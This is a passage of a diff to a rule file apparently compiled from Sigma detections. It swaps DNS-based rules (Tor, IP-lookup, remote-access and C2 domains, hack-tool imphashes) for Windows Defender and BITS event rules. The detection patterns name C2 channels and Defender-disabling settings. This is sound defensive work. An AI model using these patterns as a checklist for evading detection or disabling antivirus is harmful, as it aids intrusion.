}, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "description": "Detects the restoration of files from the defender quarantine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "Suspicious DNS Query for IP Lookup Service APIs", - "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", - "status": "test", - "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", - "author": "Brandon George (blog post), Thomas Patzke (rule)", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.reconnaissance", - "attack.t1590" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate usage of ip lookup services such as ipify API" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName IN ('canireachthe.net', 'ipv4.icanhazip.com', 'ip.anysrc.net', 'edns.ip-api.com', 'wtfismyip.com', 'checkip.dyndns.org', 'api.2ip.ua', 'icanhazip.com', 'api.ipify.org', 'ip-api.com', 'checkip.amazonaws.com', 'ipecho.net', 'ipinfo.io', 'ipv4bot.whatismyipaddress.com', 'freegeoip.app', 'ifconfig.me', 'ipwho.is') AND NOT ((NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_susp_ipify.yml" + "filename": "win_defender_threat.yml" }, { - "title": "DNS Query To Remote Access Software Domain", - "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113, Connor Martin", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate usage of the software mentioned above" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "dns_query_win_remote_access_software_domains.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "Suspicious TeamViewer Domain Access", - "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", - "status": "test", - "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Exclusions Added", + "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "status": "stable", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown binary names of TeamViewer", - "Other programs that also lookup the observed domain" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (NewProcessName LIKE '%TeamViewer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "dns_query_win_susp_teamviewer.yml" + "filename": "win_defender_exclusions.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + ], + "filename": "win_defender_exploit_guard_tamper.yml" + }, + { + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "Administrator might try to disable defender features during testing (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "AppX Package Installation Attempts Via AppInstaller", - "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", - "status": "test", - "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", - "author": "frack113", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator activity (must be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "dns_query_win_lolbin_appinstaller.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Creation Of a Suspicious ADS File Outside a Browser Download", - "id": "573df571-a223-43bc-846e-3f98da481eca", + "title": "BITS Transfer Job Downloading File Potential Suspicious Extension", + "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "status": "experimental", - "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "description": "Detects new BITS transfer job saving local files with potential suspicious extensions", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Other legitimate browsers not currently included in the filter (please add them)", - "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" + "While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.hta' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.psd1' ESCAPE '\\' OR LocalName LIKE '%.sh' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT ((LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\')))" ], - "filename": "create_stream_hash_creation_internet_file.yml" + "filename": "win_bits_client_new_transfer_saving_susp_extensions.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' 